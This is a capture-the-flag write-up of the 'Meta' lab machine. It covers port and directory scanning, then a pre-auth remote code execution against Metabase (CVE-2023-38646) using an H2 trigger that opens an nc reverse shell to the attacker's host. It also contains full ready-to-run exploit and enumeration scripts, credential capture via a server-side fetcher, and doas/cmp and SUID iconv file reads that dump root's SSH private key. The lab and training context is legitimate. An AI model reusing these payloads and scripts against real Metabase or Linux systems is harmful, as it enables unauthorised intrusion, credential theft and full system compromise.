Mazesec_Meta

Target source: QQ group 660930334

Difficulty: Easy

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 11:01 CST
Nmap scan report for 192.168.2.1
Host is up (0.0012s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00064s latency).
MAC Address: 08:00:27:92:7B:DF (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.45
Host is up (0.00074s latency).
MAC Address: 08:00:27:F0:73:F0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.11 seconds

Target IP: 192.168.2.45

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.45
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 11:02 CST
Nmap scan report for 192.168.2.45
Host is up (0.00063s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
MAC Address: 08:00:27:F0:73:F0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 33.70 seconds

Open ports: 22, 80, 3000

2) Service and version scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,3000 192.168.2.45
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 11:03 CST
Nmap scan report for 192.168.2.45
Host is up (0.00072s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
80/tcp open http nginx
|_http-title: Inspect Me
3000/tcp open http Jetty 11.0.14
|_http-server-header: Jetty(11.0.14)
|_http-title: Metabase
MAC Address: 08:00:27:F0:73:F0 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.31 seconds

3) UDP scan

┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.45
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 11:04 CST
Nmap scan report for 192.168.2.45
Host is up (0.00072s latency).
All 100 scanned ports on 192.168.2.45 are in ignored states.
Not shown: 54 closed udp ports (port-unreach), 46 open|filtered udp ports (no-response)
MAC Address: 08:00:27:F0:73:F0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 49.61 seconds

II. Web Penetration

1. Port 80

Browsing to port 80 (title "Inspect Me") shows nothing useful.

Try directory brute-forcing:

┌──(root㉿kali)-[/miaosec]
└─# gobuster dir -u http://192.168.2.45 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.45
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: db,js,php,txt,html,bak,md
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 2315]
/.html (Status: 403) [Size: 146]
/.html (Status: 403) [Size: 146]
/_t26154829-5 (Status: 301) [Size: 162] [--> http://192.168.2.45/_t26154829-5/]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

gobuster finds the directory /_t26154829-5; opening it prompts for an access key.

2. Port 3000: Metabase

Port 3000 hosts Metabase, an open-source business intelligence (BI) and data-visualization tool; the page shows version v0.46.6.

Completing the steps its setup wizard asks for leads to the admin page.

Searching exploit-db for this version turns up a Pre-Auth Remote Code Execution advisory.

III. CVE-2023-38646

CVE-2023-38646 is a pre-authentication RCE in Metabase open-source before 0.46.6.1 (enterprise before 1.46.6.1), so v0.46.6 is affected. Two weaknesses combine: the unauthenticated GET /api/session/properties still returns the instance's setup-token after setup has finished, and POST /api/setup/validate accepts that token plus an arbitrary database connection to "validate". For the embedded H2 engine, the INIT connection parameter runs SQL when the connection is opened, and H2 allows a trigger body written in JavaScript, so that SQL can call java.lang.Runtime.exec.

1) Find the setup-token
GET /api/session/properties HTTP/1.1
Host: 192.168.2.45:3000
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: metabase.DEVICE=dc533905-7513-4976-b91e-de339b1693a2
Connection: keep-alive

The response contains the token:

"setup-token":"5afdd49b-968f-4bc6-ab9d-5b1ceb24155a",

2) Reverse shell
POST /api/setup/validate HTTP/1.1
Host: 192.168.2.45:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 746

{
"token": "5afdd49b-968f-4bc6-ab9d-5b1ceb24155a",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
"advanced-options": false,
"ssl": true,
"init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('nc 192.168.2.4 4444 -e sh')\u000A$$"
},
"name": "an-sec-research-team",
"engine": "h2"
}
}

The listener catches the shell:

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.45] 38257
id
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
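The two requests above, token retrieval and the /api/setup/validate POST, chained into one script. This is an example added for this writeup, not code from the page or from Metabase. It assumes curl on the attacker box, that the target base URL, listener host and listener port are passed as arguments (http://192.168.2.45:3000, 192.168.2.4 and 4444 here), that nc -lvnp is already listening, and that the target's nc supports -e as the page's payload requires. The JSON body is the same as in the raw request above.

```shell
#!/bin/sh
# Added example for this writeup (not the page's or Metabase's code):
# chains the two requests used for CVE-2023-38646.
# Assumptions: curl is installed; $1 = target base URL, $2/$3 = listener host/port;
# a listener is already running; the target's nc supports -e.

extract_setup_token() {
    # $1 = body of GET /api/session/properties. On vulnerable builds the
    # "setup-token" key is still present after initial setup has completed.
    printf '%s' "$1" |
        sed -n 's/.*"setup-token"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' |
        head -n 1
}

build_payload() {
    # $1 = setup token, $2 = listener host, $3 = listener port.
    # Same JSON as the raw request above. H2 runs the "init" SQL when the
    # connection is opened; the trigger body is JavaScript. \n and \t below are
    # the JSON escapes for the \u000A\u0009 in the raw request.
    cat <<EOF
{"token":"$1","details":{"is_on_demand":false,"is_full_sync":false,"is_sample":false,"cache_ttl":null,"refingerprint":false,"auto_run_queries":true,"schedules":{},"details":{"db":"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;","advanced-options":false,"ssl":true,"init":"CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS \$\$//javascript\\n\\tjava.lang.Runtime.getRuntime().exec('nc $2 $3 -e sh')\\n\$\$"},"name":"an-sec-research-team","engine":"h2"}}
EOF
}

exploit() {
    target=$1
    lhost=$2
    lport=$3
    props=$(curl -s -f "$target/api/session/properties") || {
        echo "[-] could not fetch /api/session/properties" >&2
        return 1
    }
    token=$(extract_setup_token "$props")
    if [ -z "$token" ]; then
        # Patched builds (0.46.6.1 / 1.46.6.1 and later) no longer expose the token.
        echo "[-] no setup-token in properties: nothing to send" >&2
        return 1
    fi
    echo "[+] setup-token: $token"
    # /api/setup/validate is unauthenticated; it opens the H2 connection to
    # "validate" it, which is what executes INIT and therefore the trigger.
    code=$(build_payload "$token" "$lhost" "$lport" |
        curl -s -o /dev/null -w '%{http_code}' -H 'Content-Type: application/json' \
             --data-binary @- "$target/api/setup/validate")
    echo "[*] /api/setup/validate returned HTTP $code; check the listener"
}

if [ $# -eq 3 ]; then
    exploit "$1" "$2" "$3"
fi
```

Run it as `sh cve-2023-38646.sh http://192.168.2.45:3000 192.168.2.4 4444` with the listener already up. The HTTP status of the validate call does not matter; the trigger has fired by the time the response is built, so the shell is the only reliable success signal.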

IV. Privilege Escalation

1. Getting the welcome user

Listing / shows a .dockerenv file: this shell is inside a Docker container, not on the host.

ls -la /
total 88
drwxr-xr-x 1 root root 4096 Dec 30 16:42 .
drwxr-xr-x 1 root root 4096 Dec 30 16:42 ..
-rwxr-xr-x 1 root root 0 Dec 30 16:42 .dockerenv
drwxr-xr-x 1 root root 4096 Jun 29 2023 app
drwxr-xr-x 1 root root 4096 Jun 29 2023 bin
drwxr-xr-x 5 root root 320 Jan 16 07:16 dev
drwxr-xr-x 1 root root 4096 Dec 30 16:42 etc
drwxr-xr-x 1 root root 4096 Dec 30 16:42 home
drwxr-xr-x 1 root root 4096 Jun 14 2023 lib
drwxr-xr-x 5 root root 4096 Jun 14 2023 media
drwxr-xr-x 2 metabase metabase 4096 Jan 15 15:06 metabase.db
drwxr-xr-x 2 root root 4096 Jun 14 2023 mnt
drwxr-xr-x 1 root root 4096 Jun 15 2023 opt
drwxrwxrwx 1 root root 4096 Jan 15 14:40 plugins
dr-xr-xr-x 221 root root 0 Jan 16 07:16 proc
drwx------ 1 root root 4096 Dec 30 16:54 root
drwxr-xr-x 2 root root 4096 Jun 14 2023 run
drwxr-xr-x 2 root root 4096 Jun 14 2023 sbin
drwxr-xr-x 2 root root 4096 Jun 14 2023 srv
dr-xr-xr-x 13 root root 0 Jan 16 07:16 sys
drwxrwxrwt 1 root root 4096 Jan 16 07:37 tmp
drwxr-xr-x 1 root root 4096 Jun 29 2023 usr
drwxr-xr-x 1 root root 4096 Jun 14 2023 var

Look for SUID binaries inside the container:

find / -perm -4000 2>/dev/null
/usr/bin/iconv

Only iconv is SUID root. iconv converts a file between encodings and writes the result to stdout, so a SUID iconv reads any file as root (the GTFOBins iconv file-read primitive). Use it on /etc/passwd:

/usr/bin/iconv -f UTF-8 -t UTF-8 /etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
metabase:x:2000:2000:NIYPNWs7lXUEhwXF:/home/metabase:/bin/ash

The GECOS (comment) field of the metabase user holds the string NIYPNWs7lXUEhwXF.

It is the access key that /_t26154829-5 on port 80 asked for; entering it gets us in.

The page then takes a URL to fetch. Trying 127.0.0.1 as a quick test only returns an error saying the target must contain .meta.dsz.

So craft a URL that satisfies the check but points at our own host, http://192.168.2.4:4444/a.meta.dsz, and start a listener on Kali to see what the server-side fetcher sends:

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.45] 44852
GET /a.meta.dsz HTTP/1.1
Host: 192.168.2.4:4444
Authorization: Basic d2VsY29tZTpOUGtBMnNMbmJRNEVPV3l6
Accept: */*

The fetcher attaches an Authorization header: Basic d2VsY29tZTpOUGtBMnNMbmJRNEVPV3l6. Base64-decoding the value gives welcome:NPkA2sLnbQ4EOWyz, i.e. the user welcome with password NPkA2sLnbQ4EOWyz.

Those credentials work for SSH on port 22, which lands on the host rather than in the Metabase container (the container's /etc/passwd has no welcome user):

┌──(root㉿kali)-[~/miaosec]
└─# ssh welcome@192.168.2.45
welcome@192.168.2.45's password:
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

Meta:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)

2. Getting root

Check SUID binaries again, this time on the host:

Meta:~$ find / -perm -4000 2>/dev/null
/tmp/sh
/bin/bbsuid
/usr/bin/doas

doas ("do as") is a lightweight, minimal privilege-escalation tool for Linux and Unix-like systems that runs a command as another user (usually root). It is the sudo alternative used on OpenBSD and available on Alpine (the OS here, judging by /bin/ash, /bin/bbsuid and the BusyBox banner below); its idea is a simpler, more auditable configuration file, /etc/doas.conf, that restricts which users may run which commands.

If /etc/doas.conf is readable, just read it. Otherwise the permitted commands have to be found by probing: doas -n never prompts for a password, and its error text tells a denied command ("Operation not permitted") apart from one that a rule allows. Enumerate the permitted commands:

/tmp $ sh doas.sh 
[*] Starting doas smart scan...
[*] Principle: timeout <time> doas -n <cmd> (capture the error text rather than the exit code)
---------------------------------------------------
[*] Scanning the common GTFOBins list...
doas.sh: line 22: ]]: not found
[+] Hidden rule found! -> /usr/bin/cmp
Sample output: BusyBox v1.37.0 (2025-11-21 22:40:56 UTC) multi-call binary....
---------------------------------------------------
[*] Scanning every executable under /usr/bin and /bin (may be slow)...
doas.sh: line 22: ]]: not found
[+] Hidden rule found! -> /usr/bin/cmp
Sample output: BusyBox v1.37.0 (2025-11-21 22:40:56 UTC) multi-call binary....
---------------------------------------------------
[*] Scan finished.
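The author's doas.sh is not reproduced on the page; the script below is an added example of the same idea, written for this writeup and not the author's script. It assumes the error strings of OpenBSD doas/OpenDoas ("Operation not permitted" when no rule matches, "Authentication required" when a rule matches but -n forbids prompting), a timeout command with the `timeout SECS CMD` syntax (coreutils or a recent BusyBox), and a candidate list that is a hypothetical starting set, not one taken from the page.

```shell
#!/bin/sh
# Added example for this writeup (not the page's doas.sh): enumerate which commands
# doas lets the current user run when /etc/doas.conf cannot be read.
# Assumed doas messages (OpenBSD doas / OpenDoas): "Operation not permitted" = no
# matching rule; "Authentication required" = rule matches but needs a password and
# -n refuses to prompt. Anything else means the command really ran as the target user.

classify_doas() {
    # $1 = stderr captured from `doas -n <cmd>`; prints denied / needs-password / allowed
    case "$1" in
        *"Operation not permitted"*) echo denied ;;
        *"Authentication required"*|*"uthentication failed"*) echo needs-password ;;
        *) echo allowed ;;
    esac
}

probe_doas() {
    # $1 = absolute path. stdin from /dev/null plus a timeout keep interactive tools
    # (vi, less, ...) from hanging the scan; stdout is dropped, only stderr is kept,
    # which is where e.g. cmp prints its BusyBox usage text when run without args.
    err=$(timeout 3 doas -n "$1" </dev/null 2>&1 >/dev/null) || :
    classify_doas "$err"
}

scan_doas() {
    # $@ = candidate binaries; prints "<verdict>\t<path>" for everything not denied.
    for bin in "$@"; do
        [ -x "$bin" ] || continue
        case "${bin##*/}" in
            # an "allowed" hit actually RUNS the binary as root with no arguments,
            # so keep destructive ones out of the candidate set
            reboot|halt|poweroff|shutdown|init|rm|dd|mkfs*|fdisk|kill|killall) continue ;;
        esac
        verdict=$(probe_doas "$bin")
        [ "$verdict" = denied ] || printf '%s\t%s\n' "$verdict" "$bin"
    done
}

# Hypothetical starting set: common GTFOBins file-read/shell candidates first,
# then everything in the usual bin directories.
GTFO="/usr/bin/cmp /usr/bin/find /usr/bin/vi /usr/bin/less /usr/bin/awk /bin/busybox /usr/bin/env /usr/bin/xxd /usr/bin/tar"

if [ "${1:-}" = "--scan" ]; then
    scan_doas $GTFO /usr/bin/* /bin/* /usr/sbin/* /sbin/*
fi
```

Run with `sh doas-enum.sh --scan`. Two limits to keep in mind: every "allowed" line means that binary was just executed as root with no arguments, so trim the candidate set on a real system; and a rule that only permits specific arguments (`permit nopass welcome cmd cmp args -l /etc/shadow /dev/zero`) shows up as denied here because the probe passes none.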

cmp is permitted through doas (the "]]: not found" lines are the script using a bash-only test under ash and do not affect the result). cmp -l prints every byte that differs between the two files as its offset plus both bytes in octal; compared against /dev/zero that is every non-NUL byte of the first file, and the read loop turns the octal back into characters, giving an arbitrary file read as root (the GTFOBins cmp file-read). Use it on root's SSH private key:

/tmp $ doas /usr/bin/cmp -l /root/.ssh/id_ed25519 /dev/zero | while read _ oct _; do printf "\\$oct"; done
--cmp: EOF on /root/.ssh/id_ed25519
---BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBOyR8jMxEBxbwYWrDW+ozQrBbZ0c0WZxh4MPVngjRfrwAAAJBoCUTlaAlE
5QAAAAtzc2gtZWQyNTUxOQAAACBOyR8jMxEBxbwYWrDW+ozQrBbZ0c0WZxh4MPVngjRfrw
AAAECqwfHdqWeyCNBnSseB6RD608XQ+rqLO0UYSDVXj6I3ZU7JHyMzEQHFvBhasNb6jNCs
FtnRzRZnGHgw9WeCNF+vAAAACXJvb3RATWV0YQECAwQ=
-----END OPENSSH PRIVATE KEY-----
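The cmp one-liner above as a reusable script, with the pieces the one-liner leaves implicit. This is an added example for this writeup, not the page's own command; it assumes doas allows /usr/bin/cmp for the current user, as the scan found, and that the file to read is passed as the first argument.

```shell
#!/bin/sh
# Added example for this writeup (not the page's one-liner): read a root-only file
# through a doas-permitted cmp. Assumes `doas /usr/bin/cmp` is allowed for this user.

decode_cmp_l() {
    # stdin: output of `cmp -l FILE /dev/zero`, one line per differing byte:
    #   <1-based offset> <octal byte from FILE> <octal byte from /dev/zero, always 0>
    # cmp -l lists only bytes that DIFFER, so the NUL bytes of FILE never appear and
    # the page's one-liner silently drops them (harmless for a text key, fatal for a
    # binary). Here gaps in the offset column are refilled with NULs; only trailing
    # NULs are still lost, since no later offset bounds them.
    next=1
    while read -r off oct rest; do
        while [ "$next" -lt "$off" ]; do
            printf '\000'
            next=$((next + 1))
        done
        printf "\\$oct"          # e.g. oct=55 -> printf '\55' -> '-'
        next=$((off + 1))
    done
}

doas_read() {
    # $1 = file readable only by root. /dev/zero is endless, so cmp always ends with
    # "cmp: EOF on <file>" on stderr; that is expected and is discarded here instead
    # of being interleaved with the key as in the transcript above.
    doas /usr/bin/cmp -l "$1" /dev/zero 2>/dev/null | decode_cmp_l
}

if [ $# -eq 1 ]; then
    doas_read "$1"
fi
```

Usage: `sh doas-read.sh /root/.ssh/id_ed25519 > id` gives a file that starts with the BEGIN line directly, ready for `chmod 600 id`.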

In the output above, cmp's "cmp: EOF on /root/.ssh/id_ed25519" stderr message is interleaved with the first line of the key; the real first line is -----BEGIN OPENSSH PRIVATE KEY-----. Save the key without that stderr text to a file named id, chmod 600 id, and connect:

┌──(root㉿kali)-[/tmp]
└─# ssh root@192.168.2.45 -i id
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

Meta:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

V. Flags

root.txt from the root shell on the host; user.txt is read from the container shell through the SUID iconv found earlier:

Meta:~# cat /root/root.txt 
flag{root-7c577b6ec894f1a5ce0a5800d361a962}

/usr/bin/iconv -f UTF-8 -t UTF-8 /root/user.txt
flag{user-76eb20838e44a9ef2f72a763632ef061}

Mazesec_Meta
http://miao-sec.github.io/Maze-sec/Mazesec-Meta/
Author: Miao
Published: 16 January 2026
License: BY-MIAO